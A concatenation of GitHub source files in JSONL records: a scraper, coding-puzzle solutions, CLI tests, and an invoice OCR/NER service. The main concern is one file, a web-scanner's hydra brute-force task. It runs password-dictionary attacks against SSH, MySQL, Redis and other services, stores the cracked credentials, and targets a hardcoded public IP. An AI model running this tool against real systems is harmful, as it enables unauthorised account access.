soup.find(\"a\", text=\"Download\")[\"href\"]\n csv_url = f\"https://www.vec.virginia.gov{csv_href}\"\n\n # Download it to the cache\n cache.download(\"va/source.csv\", csv_url, verify=False)\n\n # Open it up as a list of rows\n csv_rows = cache.read_csv(\"va/source.csv\")\n\n # Set the export path\n data_path = data_dir / \"va.csv\"\n\n # Write out the file\n utils.write_rows_to_csv(data_path, csv_rows)\n\n # Return the export path\n return data_path\n\n\nif __name__ == \"__main__\":\n scrape()\n","repo_name":"biglocalnews/warn-scraper","sub_path":"warn/scrapers/va.py","file_name":"va.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"18973875629","text":"class Solution:\n def findMaxConsecutiveOnes(self, nums) -> int:\n \n count = 0\n res = 0\n \n for num in nums:\n if num == 1:\n count += 1\n res = max(res, count)\n else:\n count = 0 \n return res\n\ns = Solution()\nnums = [0, 1, 0, 1, 1, 1]\nprint(s.findMaxConsecutiveOnes(nums))","repo_name":"miayuxin/leetcode","sub_path":"No.485_Max Consecutive Ones.py","file_name":"No.485_Max Consecutive Ones.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28890280706","text":"import pytest\n\nfrom click.testing import CliRunner\nfrom secedgar.cli import filing, daily\nfrom secedgar.utils.exceptions import 
FilingTypeError\n\n\nclass CLITestingMixin:\n \"\"\"CLI testing utilities mixin class.\"\"\"\n\n def __init__(self, cli):\n self.cli = cli\n\n def run_cli_command(self, user_input, tmp_data_directory):\n runner = CliRunner()\n user_input = user_input + \" --directory {}\".format(tmp_data_directory)\n return runner.invoke(self.cli, user_input)\n\n def test_bad_inputs(self, user_input, expected_exception, tmp_data_directory):\n # SystemExit does not raise exception by runner\n if expected_exception is SystemExit:\n result = self.run_cli_command(user_input, tmp_data_directory)\n assert result.exit_code != 0\n else:\n with pytest.raises(expected_exception):\n self.run_cli_command(user_input, tmp_data_directory)\n\n\nclass TestCLIFiling(CLITestingMixin):\n\n def __init__(self):\n super().__init__(cli=filing)\n\n @pytest.mark.parametrize(\n \"user_input,expected_exception\",\n [\n (\"-l aapl msft Facebook\", SystemExit), # missing filing type\n (\"-l aapl -t null\", FilingTypeError), # unrecognized filing type\n (\"-l aapl -t FILING_10Q -n abc\", SystemExit), # count is not int\n (\"-l aapl -t FILING_10Q -n 0\", ValueError) # no filings available if 0 picked\n ]\n )\n def test_filing_bad_inputs(self, user_input, expected_exception, tmp_data_directory):\n self.test_bad_inputs(user_input, expected_exception, tmp_data_directory)\n\n @pytest.mark.parametrize(\n \"user_input\",\n [\n \"-l aapl msft fb FILING_10Q\",\n \"-l aapl msft fb FILING_10Q -n 10\",\n \"-l aapl msft fb FILING_10Q -n 1\"\n ]\n )\n def test_multiple_companies_input(self, user_input, tmp_data_directory):\n pass\n\n\nclass TestCLIDaily(CLITestingMixin):\n\n def __init__(self, cli):\n super().__init__(cli=daily)\n\n @pytest.mark.parametrize(\n \"user_input,expected_exception\",\n [\n (\"\", SystemExit),\n (\"-d 2020\", SystemExit)\n ]\n )\n def test_daily_bad_inputs(self, user_input, expected_exception, tmp_data_directory):\n self.test_bad_inputs(user_input, expected_exception, tmp_data_directory)\n","repo_name":"sn0wfree/sec-edgar","sub_path":"secedgar/tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"25136210921","text":"import aocd\nimport sys\n\nfrom collections import defaultdict, Counter\nfrom functools import reduce\n\nDEBUG = False\n\n# Eager evaluation makes this easier\nlmap = lambda x, y: list(map(x, y))\nlfilter = lambda x, y: list(filter(x, y))\ntzip = lambda *x: list(zip(x))\n\n\ndef get_input():\n if len(sys.argv) == 1:\n return aocd.get_data(day=14).split(\"\\n\")\n else:\n with open(\"input\", \"r\") as filey:\n return lmap(lambda x: x.strip(), filey)\n\n\ndef transformed_input():\n g = get_input()\n return g[0], lmap(lambda x: tuple(x.split(\" -> \")), g[2:])\n\n\ndef make_map(subs):\n return {x[0]: x[1] for x in subs}\n\n\ndef turn(string_pairs, dictionary, char_count):\n for (x, y), count in list(string_pairs.copy().items())[:]:\n key = dictionary.get(x + y)\n if DEBUG:\n print(key)\n if not key:\n continue\n string_pairs[(x, y)] -= count\n string_pairs[(x, key)] += count\n string_pairs[(key, y)] += count\n char_count[key] += count\n\n\ndef solution():\n string, dictionary = transformed_input()\n dictionary = make_map(dictionary)\n string_pairs = zip(list(string), list(string[1:]))\n if DEBUG:\n print(\"String Pairs: \", string_pairs)\n count = Counter(list(string))\n if DEBUG:\n print(count)\n pair_counter = Counter(string_pairs)\n if DEBUG:\n print(\"Pair Counter: \", 
pair_counter)\n for i in range(40):\n turn(pair_counter, dictionary, count)\n if DEBUG:\n print(\"Pair Counter: \", pair_counter)\n if DEBUG:\n print(\"Count: \", count)\n count += Counter()\n if DEBUG:\n print(\"Count: \", count)\n return count.most_common()[0][1] - count.most_common()[-1][1]\n\n\nif __name__ == \"__main__\":\n print(solution())\n\"\"\"\nabcd\nab -> e\nbc -> f\ncd -> g\n\nStart\n[ab] = 1\n[bc] = 1\n[cd] = 1\n\n[ab]--\n[ae]++\n[eb]++\n...\n\n\nababab\nab -> c\nba -> d\nacbdacbdacb\n[ab] = 3\n[ba] = 2\n[ab] -= 3\n[ac] += 3\n[cb] += 3\n[bd] += 2\n[da] += 2\n\n\n\n\"\"\"\n","repo_name":"justinba1010/aoc2021","sub_path":"2021/d14/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74637478827","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 8/5/19 7:30 PM\n# @Author : Archerx\n# @Blog : https://blog.ixuchao.cn\n# @File : tasks.py\n\n'''\n爆破脚本\n'''\n\nimport os\nimport time\nimport uuid\nfrom celery_tasks.main import app\nfrom conf.global_config import HYDRADIC_SMALL, HYDRADIC_LARGE\nfrom utils.mongo_op import MongoDB\nimport json\nfrom conf.global_config import realjoin\nimport re\nfrom conf.global_config import DIC_USERNAME_FTP, DIC_USERNAME_IMAP, DIC_USERNAME_MEMCACHED, DIC_USERNAME_MONGODB, DIC_USERNAME_MYSQL, \\\n DIC_USERNAME_ORACLE, DIC_USERNAME_POP3, DIC_USERNAME_POSTGRESQL, DIC_USERNAME_RDP,DIC_USERNAME_REDIS, DIC_USERNAME_SMB,DIC_USERNAME_SMTP,\\\n DIC_USERNAME_MSSQL,DIC_USERNAME_SSH,DIC_USERNAME_SVN,DIC_USERNAME_TELNET,DIC_USERNAME_TOMCAT,DIC_USERNAME_VNC,DIC_USERNAME_WEBLOGIC,COMMON_USERNAME,USERNAME_DICT\n\n\n@app.task(bind=True, name='HydraBrute')\ndef dispatch(self, taskID, username, dict, host, port, service):\n # have fixed 任务执行成功,但是无法发送ack导致任务重复执行 amqp.exceptions.RecoverableConnectionError: connection already closed \\\n # 原因是cpu占用过高,心跳线程没有足够的cpu资源导致两次心跳包未发送rabbitmq直接关闭连接\n # http://eventlet.net/doc/modules/debug.html#eventlet.debug.hub_blocking_detection\n # 解决方法 1.降低cpu使用 2.增大rabbitmq的心跳阈值\n # 目前采取将心跳阈值增大到 600s -> 解决,目前没发现别的问题\n\n if username == \"dict\": #跑username字典\n NameDictBrute(taskID, dict, host, port, service)\n else:\n NameBrute(taskID, username, dict, host, port, service)\n\n\ndef handle_result(taskID, result, service):\n print(\"this is the begin\")\n x = result.strip('\\n').split(' ')\n if result is 's':\n _result = {\n 'redis': {\n 'service':service,\n 'port': x[0].strip('[').split(']')[0],\n 'login': '',\n 'password': ''\n }\n }\n else:\n _result = {\n x[0].strip('[').split(']')[1][1:]: {\n 'service': service,\n 'port': x[0].strip('[').split(']')[0],\n 'login': x[6].strip(),\n 'password': x[10].strip()\n }\n }\n print(_result)\n x = MongoDB()\n x.add_weak_pass_service(taskID, json.dumps(_result))\n\ndef NameBrute(taskID, username, large_or_small, host, port, service):\n '''\n 用于username已经确定的情况下\n :param taskID:\n :param username:\n :param large_or_small:\n :param host:\n :param port:\n :param service:\n :return:\n '''\n file_name = str(uuid.uuid1())\n if service in ['redis','cisio','snmp','vnc']:\n _ = os.system(\"hydra -P {} {} -s {} {} -I -o {} -f\".format(HYDRADIC_LARGE if large_or_small == \"large\" else HYDRADIC_SMALL,\n host, port, service, file_name))\n else:\n _ = os.system(\"hydra -l {} -P {} {} -s {} {} -I -o {}\".format(username, HYDRADIC_LARGE if large_or_small == \"large\" else HYDRADIC_SMALL,\n host, port, service, file_name))\n\n with open(file_name,'r') as f:\n 
        print(f.read())\n        for _ in f:\n            if _.startswith('['):\n                handle_result(taskID, _, service)\n    os.remove(file_name)\n\ndef NameDictBrute(taskID, large_or_small, host, port, service):\n    '''\n    Used when neither the username nor the password is known\n    :param taskID:\n    :param large_or_small:\n    :param host:\n    :param port:\n    :param service:\n    :return:\n    '''\n    # the redis, adam6500, cisco, oracle-listener, s7-300, snmp and vnc modules are only using the -p or -P option, not login (-l, -L) or colon file (-C).\n    file_name = str(uuid.uuid1())\n    dict_name = 'dic_username_' + service + '.txt'\n    username_dict = realjoin(USERNAME_DICT,dict_name)\n    if service in ['redis','cisio','snmp','vnc']:\n        _ = os.system(\"hydra -P {} {} -s {} {} -I -o {} -f -t 15\".format(HYDRADIC_LARGE if large_or_small == \"large\" else HYDRADIC_SMALL,\n                                               host, port, service, file_name))\n    else:\n        _ = os.system(\"hydra -L {} -P {} {} -s {} {} -I -o {} -f -t 15\".format(username_dict,\n                                               HYDRADIC_LARGE if large_or_small == \"large\" else HYDRADIC_SMALL,\n                                               host, port, service, file_name))\n    # \"does not support password authentication.\" usually means password auth is disabled and key-based auth is used instead\n    print(_)\n    ## TODO unauthenticated redis access is still not handled\n    ## the output file is not always created, so exception handling is needed here\n    with open(file_name, 'r') as f:\n        print(\"-------------------------------------------------\"+f.read())\n        for _ in f:\n            if _.startswith('['):\n                handle_result(taskID, _ , service)\n\n    os.remove(file_name)\n\n\n## TODO this error leads to an endless loop: [ERROR] \u0004Host '114.88.233.234' is not allowed to connect to this MySQL server\n## see the BruteDum approach for a fix\n\n\nif __name__ == '__main__':\n    # SSHBrute('sa','small','127.0.0.1','1433','mssql')\n\n    # dispatch('5d7e39cd13e0dfe95c52e4cf','dict','small','127.0.0.1','6379','redis')\n    dispatch('5d9af9c0774c122660fb837e','dict','small','149.129.89.190','22','ssh')\n    # handle_result('5d51652fa814d0464ed543b7',\"[22][ssh] host: 127.0.0.1 login: x password: xuchao\")\n    # handle_result('5d51652fa814d0464ed543b7',\"[22][aaa] host: 127.0.0.1 login: x password: xuchao\")\n\n    # NameBrute('root','small','127.0.0.1','3306','mysql')\n    # NameBrute('root','small','127.0.0.1','3389','rdp')\n    # smb, pop3, telnet and ftp are supported as well","repo_name":"xuchaoa/WebScan","sub_path":"celery_tasks/WeakBrute/hydra/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"37"} +{"seq_id":"31951920511","text":"import os\nimport io\nimport re\nimport fitz\nimport time\nimport sys\nimport json\nimport cv2\nimport glob\nimport joblib\nimport torch\nimport pandas as pd\nimport uvicorn\nimport tempfile\nimport string\nimport pytesseract\nimport websockets\nimport subprocess\nimport numpy as np\nfrom typing import List, Union\nfrom collections import OrderedDict\nfrom keras.models import load_model\nfrom keras_contrib.layers import CRF\nfrom keras_contrib.losses import crf_loss\nfrom fastapi import FastAPI, Depends, HTTPException, UploadFile, File\nfrom fastapi.responses import JSONResponse\nfrom fastapi.security import APIKeyHeader\nfrom pdf2image import convert_from_path\nfrom PIL import Image\nfrom pdfminer.high_level import extract_text\nfrom keras_preprocessing.sequence import pad_sequences\nfrom keras_contrib.metrics import crf_viterbi_accuracy\nfrom dotenv import load_dotenv\n\n# Load environment variables from .env 
file\nload_dotenv()\n\napp = FastAPI()\n\n\nclass PDFProcessor:\n    def __init__(self, pdf_path, image_folder_path):\n        self.pdf_path = pdf_path\n        self.image_folder_path = image_folder_path\n        self.pdf_images = None\n        self.pages = None\n\n    def convert_pdf_to_images(self):\n        image_folder_name = os.path.splitext(os.path.basename(self.pdf_path))[0]\n        self.image_folder_path = os.path.join(self.image_folder_path, image_folder_name)\n\n        # Create the image folder if it doesn't exist\n        if not os.path.exists(self.image_folder_path):\n            os.makedirs(self.image_folder_path)\n\n        # Convert the PDF file to JPEG images and save them to the image folder\n        images = convert_from_path(self.pdf_path, dpi=300, fmt=\"jpg\")\n\n        for i, image in enumerate(images):\n            # Construct the filename using the PDF filename and page number\n            filename = f\"{os.path.splitext(os.path.basename(self.pdf_path))[0]}_{i + 1}.jpg\"\n            image_path = os.path.join(self.image_folder_path, filename)\n            # Save the image to the specified path\n            image.save(image_path, \"JPEG\")\n\n        # store the folder path (not just its name) so downstream glob/detect calls resolve\n        self.pdf_images = self.image_folder_path\n        self.pages = len(images)\n\n\nclass YOLOv5Detector:\n    def __init__(self, weights_path, conf_threshold, source_path, yolo_folder):\n        self.weights_path = weights_path\n        self.conf_threshold = conf_threshold\n        self.source_path = source_path\n        self.yolo_folder = yolo_folder\n\n    def run_detection(self):\n        os.chdir(self.yolo_folder)\n        cmd = f\"python3 {self.yolo_folder}/detect.py --weights {self.weights_path} --conf {self.conf_threshold} --source {self.source_path} --save-txt\"\n        subprocess.run(cmd, shell=True)\n\n    def get_annotations(self):\n        parent_folder = os.path.join(self.yolo_folder, \"runs\", \"detect\")\n        subfolders = os.listdir(parent_folder)\n        subfolders = [subfolder for subfolder in subfolders if subfolder != \"exp\"]\n        subfolder_numbers = [\n            int(subfolder.split(\"exp\")[-1])\n            for subfolder in subfolders\n            if \"exp\" in subfolder and subfolder.split(\"exp\")[-1].isdigit()\n        ]\n\n        if subfolder_numbers:\n            latest_subfolder_number = max(subfolder_numbers)\n            latest_subfolder = f\"exp{latest_subfolder_number}\"\n        else:\n            latest_subfolder = \"exp\"\n\n        annotation_folder = os.path.join(parent_folder, latest_subfolder, \"labels\")\n        return annotation_folder\n\n\nclass DataExtractor:\n    def __init__(self, pdf_images, annotation_folder):\n        self.pdf_images = pdf_images\n        self.annotation_folder = annotation_folder\n\n    def extract_data_v5(self, pdf_images, annotation_folder):\n        customer_name, vendor_name, cvr, invoice_no, due_date = \"\", \"\", \"\", \"\", \"\"\n        product_number, content_unit, product_price = [], [], []\n\n        img_paths = sorted(glob.glob(pdf_images + \"/*.jpg\"))\n\n        for img_path in img_paths:\n            # load the image\n            img = cv2.imread(img_path)\n\n            coords = \"0 0.681648 0.091135 0.561917 0.090637\"\n            id, x, y, w, h = map(float, coords.split())\n\n            l = int((x - w / 2) * img.shape[1])\n            r = int((x + w / 2) * img.shape[1])\n            t = int((y - h / 2) * img.shape[0])\n            b = int((y + h / 2) * img.shape[0])\n\n            roi = img[t:b, l:r]\n            gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n            ret, thresh = cv2.threshold(\n                gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU\n            )\n            kernel = np.ones((3, 100), np.uint8)\n            dilated = cv2.dilate(thresh, kernel, iterations=1)\n\n            text = pytesseract.image_to_string(roi, lang=\"dan\")\n\n            if \"inco København Cash & Carry A/S\" in text:\n                vendor_name = \"inco København Cash & Carry A/S\"\n\n            # extract the file name from img_path\n            file_name = os.path.basename(img_path)\n            file_name = os.path.splitext(file_name)[0]\n\n            # 
construct the annotation_path\n annotation_path = os.path.join(annotation_folder, file_name + \".txt\")\n\n with open(annotation_path, \"r\") as f:\n data = f.readlines()\n\n sorted_data = sorted(\n data, key=lambda x: (float(x.split(\" \")[0]), float(x.split(\" \")[2]))\n )\n\n # Loop through the annotations and draw the boxes\n for dt in sorted_data:\n id, x, y, w, h = map(float, dt.split(\" \"))\n l = int((x - w / 2) * img.shape[1])\n r = int((x + w / 2) * img.shape[1])\n t = int((y - h / 2) * img.shape[0])\n b = int((y + h / 2) * img.shape[0])\n\n roi = img[t:b, l:r]\n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(\n gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU\n )\n kernel = np.ones((3, 100), np.uint8)\n dilated = cv2.dilate(thresh, kernel, iterations=1)\n\n text = pytesseract.image_to_string(roi, lang=\"dan\")\n\n label = int(id)\n if label == 0:\n text = text.replace(\"”\", \"*\")\n customer_name = text.strip()\n\n elif label == 1:\n vendor_name = text.strip()\n\n elif label == 2:\n # cvr = text.strip()\n cvr_values = re.findall(r\"\\b\\d+\\b\", text)\n # Join the numeric values into a single string\n cvr = \"\".join(cvr_values)\n\n elif label == 3:\n invoice_no = text.strip()\n\n elif label == 4:\n due_date = text.strip()\n\n elif label == 5:\n product_number.extend(filter(None, text.strip().split(\"\\n\")))\n elif label == 6:\n content_unit.extend(filter(None, text.strip().split(\"\\n\")))\n\n elif label == 7:\n numeric_values = re.findall(r\"\\b\\d+(?:,\\s*\\d+)*\\b\", text)\n product_price.extend(numeric_values)\n\n print(\"product_number_len: \", len(product_number))\n print(\"product_price_len: \", len(product_price))\n return (\n customer_name,\n vendor_name,\n cvr,\n invoice_no,\n due_date,\n product_number,\n content_unit,\n product_price,\n )\n\n def extract_data_v7(self, pdf_images, annotation_folder):\n\n extracted_data = []\n invoice_date = \"\"\n quantity = []\n product_name = []\n product_total = []\n total_box = []\n total_excluding_tax = \"\"\n tax = \"\"\n total_including_tax = \"\"\n\n antal = []\n enhed = []\n\n isSpecial = False\n content_indexes = []\n\n sum = 0\n\n img_paths = sorted(glob.glob(pdf_images + \"/*.jpg\"))\n\n for img_path in img_paths:\n isOverfort = False\n\n # Read the image\n img = cv2.imread(img_path)\n\n # extract the file name from img_path\n file_name = os.path.basename(img_path)\n file_name = os.path.splitext(file_name)[0]\n\n # construct the annotation_path\n annotation_path = os.path.join(annotation_folder, file_name + \".txt\")\n\n with open(annotation_path, \"r\") as f:\n data = f.readlines()\n\n sorted_data = sorted(\n data, key=lambda x: (float(x.split(\" \")[0]), float(x.split(\" \")[2]))\n )\n\n text = pytesseract.image_to_string(img, lang=\"dan\")\n\n if \"Ordreliniertotal\" in text:\n isSpecial = True\n\n if \"Overført\" in text:\n isOverfort = True\n\n # Loop through the annotations and draw the boxes\n for dt in sorted_data:\n id, x, y, w, h = map(float, dt.split(\" \"))\n l = int((x - w / 2) * img.shape[1])\n r = int((x + w / 2) * img.shape[1])\n t = int((y - h / 2) * img.shape[0])\n b = int((y + h / 2) * img.shape[0])\n\n roi = img[t:b, l:r]\n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n ret, thresh = cv2.threshold(\n gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU\n )\n kernel = np.ones((3, 100), np.uint8)\n dilated = cv2.dilate(thresh, kernel, iterations=1)\n\n text = pytesseract.image_to_string(\n roi, config=\"--oem 3 --psm 6\", lang=\"dan\"\n )\n\n if id == 0:\n text = \" 
\".join(text.split(\"\\n\"))\n invoice_date = text.strip()\n\n elif id == 1:\n quantity.extend(\n line.strip() for line in text.split(\"\\n\") if line.strip()\n )\n\n elif id == 2:\n lines = text.split(\"\\n\")\n lines = [\n line.strip()\n for line in lines\n if line\n and not line.startswith(\"Subtotal\")\n and \"Overført\" not in line\n and not line.startswith(\"D-mærke\")\n ]\n product_name.extend(lines)\n\n elif id == 3:\n # product_total.extend(line.strip() for line in text.split('\\n') if line.strip())\n numeric_values = re.findall(r\"\\b\\d{1,3}(?:\\.\\d{3})*(?:,\\d+)\\b\", text)\n\n product_total.extend(numeric_values)\n\n elif id == 4:\n total_box.extend(\n line.strip() for line in text.split(\"\\n\") if line.strip()\n )\n\n # Modify the elements in total_box to only contain the numeric values\n for i, val in enumerate(total_box):\n total_box[i] = val.split()[-1]\n\n # Extract values from the modified total_box list\n total_excluding_tax = total_box[0]\n tax = total_box[1]\n total_including_tax = total_box[2]\n\n for value in quantity:\n value = value.split(\" \")\n antal.append(value[0])\n enhed.append(value[1])\n\n is_content_section = False\n\n product_name_cleaned = [line for line in product_name if not line.isupper()]\n\n if not isSpecial:\n for i, val in enumerate(product_name):\n if val == \"GRØNT\":\n # If 'GRØNT' is found, we start looking for the next product and append its index\n is_content_section = True\n next_product_index = i + 1\n\n # Check if the next product index is within the range of product_name\n while next_product_index < len(product_name):\n next_product = product_name[next_product_index]\n if next_product in product_name_cleaned:\n index_in_cleaned = product_name_cleaned.index(next_product)\n content_indexes.append(index_in_cleaned)\n next_product_index += 1\n else:\n break\n\n elif val.isupper() and is_content_section:\n # If an all uppercase item is found and we were in a content section, we stop appending indexes\n break\n\n # for prod in product_name:\n # print(prod)\n\n # print('-------------------')\n\n # for prod in product_name_cleaned:\n # print(prod)\n\n # print(content_indexes)\n\n extracted_data = (\n invoice_date,\n antal,\n enhed,\n product_name,\n product_total,\n total_excluding_tax,\n tax,\n total_including_tax,\n content_indexes,\n )\n\n print(\"product_name_len: \", len(product_name))\n print(\"product_total_len: \", len(product_total))\n print(\"antal_len: \", len(antal))\n print(\"enhed_len: \", len(enhed))\n\n return extracted_data\n\n def get_combined_data(self, extracted_data_v5, extracted_data_v7, pages, nlp_output):\n (\n customer_name,\n vendor_name,\n cvr,\n invoice_no,\n due_date,\n product_numbers,\n content_unit,\n product_price,\n ) = extracted_data_v5\n (\n invoice_date,\n antal,\n enhed,\n product_name,\n product_total,\n total_excluding_tax,\n tax,\n total_including_tax,\n _,\n ) = extracted_data_v7\n\n result = {\n \"invoice_number\": invoice_no,\n \"invoice_date\": invoice_date,\n \"due_date\": due_date,\n \"total_pages\": pages,\n \"sub_total\": total_excluding_tax,\n \"vat\": tax,\n \"total\": total_including_tax,\n \"vendor\": {\n \"name\": vendor_name,\n \"cvr\": cvr,\n \"address\": None,\n \"email\": None,\n },\n \"company\": {\n \"id\": None,\n \"name\": customer_name,\n \"cvr\": cvr,\n \"address\": None,\n \"email\": None,\n },\n \"products\": [],\n }\n try:\n for i in range(len(product_numbers)):\n product = {\n \"product_number\": product_numbers[i],\n \"product_desc\": nlp_output[i],\n \"antal\": antal[i],\n 
\"enhed\": enhed[i],\n \"content_unit\": content_unit[i],\n \"price\": product_price[i],\n \"total\": product_total[i],\n }\n result[\"products\"].append(product)\n except:\n print(\"Error in creating products\")\n pass\n\n return result\n\n\nclass NERModel:\n def __init__(self, model_path, word2idx_path, tag2idx_path):\n self.model_path = model_path\n self.word2idx_path = word2idx_path\n self.tag2idx_path = tag2idx_path\n\n self.max_len = 1000\n self.model = None\n self.word2idx = None\n self.tag2idx = None\n\n def load_model(self):\n self.model = load_model(\n self.model_path,\n custom_objects={\"CRF\": CRF, \"crf_loss\": crf_loss, \"crf_viterbi_accuracy\": crf_viterbi_accuracy},\n )\n\n with open(self.word2idx_path, \"rb\") as f:\n self.word2idx = joblib.load(f)\n\n with open(self.tag2idx_path, \"rb\") as f:\n self.tag2idx = joblib.load(f)\n\n word2idx = {w: i + 1 for i, w in enumerate(words)}\n tag2idx = {t: i for i, t in enumerate(tags)}\n idx2tag = {i: w for w, i in tag2idx.items()}\n\n def test_sentence_sample(test_sentence):\n results = []\n x_test_sent = pad_sequences(\n sequences=[[word2idx.get(w, 0) for w in tokenize(test_sentence)]],\n padding=\"post\",\n value=0,\n maxlen=max_len,\n )\n p = model_predict.predict(np.array([x_test_sent[0]]))\n p = np.argmax(p, axis=-1)\n for w, pred in zip(tokenize(test_sentence), p[0]):\n results.append([w, tags[pred]])\n return results\n\n def tokenize(s):\n if isinstance(s, (list, tuple)):\n s = \"\\n\".join(map(str, s))\n return s.split(\"\\n\")\n\n def remove_empty_lines(self, text):\n lines = text.split(\"\\n\")\n non_empty_lines = [line for line in lines if line.strip()]\n return \"\\n\".join(non_empty_lines)\n\n def process_text(self, text):\n lines = text.split(\"\\n\")\n processed_lines = []\n\n for line in lines:\n\n line = re.sub(r'\\s+', ' ', line)\n\n if \" f \" in line:\n regex = r\" f (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(line.replace(\" f \" + match.group(1), \"\"))\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n elif line.startswith(\"f \"):\n regex = r\"f (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(\"\")\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n\n elif re.match(r\"^\\s*ø (.+)\", line):\n regex = r\"ø (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(match.group(1))\n\n\n elif \"fø \" in line:\n regex = r\"fø (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(\"\")\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n # Add more conditions here...\n elif re.search(r\"\\s(?:f|ø|fø)\\s\", line):\n regex = r\"\\s(?:f|ø|fø)\\s(.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(line.replace(match.group(0), \"\"))\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n elif re.search(r\"^\\d+\\s[A-Z]+\\s\", line):\n regex = r\"^(\\d+\\s[A-Z]+\\s)(.*)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(match.group(1))\n processed_lines.append(match.group(2))\n else:\n processed_lines.append(line)\n elif \" ÆSK \" in line:\n regex = r\" ÆSK (.+)\"\n match = re.search(regex, line)\n if match:\n processed_lines.append(line.replace(\" ÆSK \" + match.group(1), \"\"))\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n elif \" SÆK \" in line:\n regex = r\" SÆK (.+)\"\n match = re.search(regex, line)\n if match:\n 
processed_lines.append(line.replace(\" SÆK \" + match.group(1), \"\"))\n processed_lines.append(match.group(1))\n else:\n processed_lines.append(line)\n # Skip lines starting with numeric value and space, or containing only uppercase text\n elif re.match(r\"^\\d+\\s[A-ZÆØÅÉÆØÅa-z0-9\\s\\-!@#$%^&*()_+=[\\]{}|;:'\\\",.<>?/\\\\]+\", line):\n continue\n # Skip lines containing only numeric values with length less than 4\n elif line.isdigit() and len(line) < 4:\n continue\n # Skip lines starting with numeric value containing dot, comma, or both\n elif re.match(r\"^-?\\d+[,.]\\d+\", line):\n continue\n # Skip lines starting with \"D-mærke\"\n elif line.startswith(\"D-mærke\"):\n continue\n elif line in [\"D\", \"f\", \"ø\", \"fø\"]:\n continue\n elif re.match(r\"^-\", line):\n continue\n elif \"Subtotal\" == line:\n continue\n elif re.match(r\"^\\.\\s*\\.\\s*\\.\\s*\\.\\s*\\.\\s*\\.\\s*\\.\\s*\\.$\", line):\n continue\n else:\n processed_lines.append(line)\n return processed_lines\n\n def extract_lines_with_condition(self, lines):\n processed_lines = []\n start_extraction = False\n\n for line in lines:\n if \"Varenr.\" in line:\n start_extraction = True\n if start_extraction and \"subtotal\" in line:\n break\n if start_extraction and re.match(r\"^-?\\d+\\s[A-Z]+\", line):\n continue\n if re.match(r\"^[A-ZÆØÅÉ]+$\", line):\n continue\n if start_extraction:\n processed_lines.append(line)\n\n return processed_lines\n\n def extract_products_faktura(lines):\n processed_lines = []\n extract_next_line = False\n\n for line in lines:\n if not line.strip(): # Skip empty lines\n continue\n if re.match(r\"^\\d{4,6}$\", line) and '.' not in line and ',' not in line:\n extract_next_line = True\n elif extract_next_line:\n processed_lines.append(line)\n extract_next_line = False\n return processed_lines\n\n def extract_products_kreditnota(lines):\n processed_lines = []\n previous_line = None\n\n for line in lines:\n if re.match(r\"^\\d{4,6}$\", line) and '.' 
 not in line and ',' not in line:\n                # a product-number line closes the pending product-name line\n                if previous_line is not None:\n                    processed_lines.append(previous_line)\n                previous_line = None\n            elif line.strip():\n                # remember the most recent non-empty candidate name line\n                previous_line = line\n\n        return processed_lines\n\n    def split_text_into_lines(self, text):\n        lines = text.splitlines()\n        non_empty_lines = [line for line in lines if line.strip()]\n        return non_empty_lines\n\n    def split_text(self, lines):\n        return lines.split()\n\n    def product_extraction(self, pdf_path):\n        full_processed_text = \"\"\n        with fitz.open(pdf_path) as pdf:\n            for page_number in range(pdf.page_count):\n                page = pdf.load_page(page_number)\n                page_text = page.get_text()\n\n                page_text_cleaned = page_text.replace(\"�\", \" \")\n                processed_text = self.process_text(page_text_cleaned)\n                trimmed_text = self.extract_lines_with_condition(processed_text)\n                if \"Kreditnota\" not in page_text:\n                    products_faktura = self.extract_products_faktura(trimmed_text)\n                if \"Kreditnota\" in page_text:\n                    products_kreditnota = self.extract_products_kreditnota(trimmed_text)\n\n                products = products_kreditnota if \"Kreditnota\" in page_text else products_faktura\n\n                processed_text_as_string = \"\\n\".join(products)\n\n                full_processed_text += processed_text_as_string + \"\\n\"\n\n        return full_processed_text\n\n    def pdf_to_model_predictions(self, pdf_path):\n        predictions = []\n        with fitz.open(pdf_path) as pdf:\n            for page_number in range(pdf.page_count):\n                page = pdf.load_page(page_number)\n                page_text = page.get_text()\n\n                page_text_cleaned = page_text.replace(\"�\", \" \")\n                text_tokens = self.split_text(page_text_cleaned)\n                page_predictions = self.test_sentence_sample(text_tokens)\n                predictions.extend(page_predictions)\n\n        return predictions\n\n    def post_processing(self, predictions):\n        descriptions = []\n        for text, tag in predictions:\n            if tag in [\"B-BESKRIVELSE\", \"I-BESKRIVELSE\"]:\n                descriptions.append(text)\n        return descriptions\n\n    def results_post_processing(self, data):\n        descriptions = []\n        buffer = []\n\n        for entry in data:\n            if entry[1] == 'B-BESKRIVELSE':\n                if buffer:\n                    descriptions.append(' 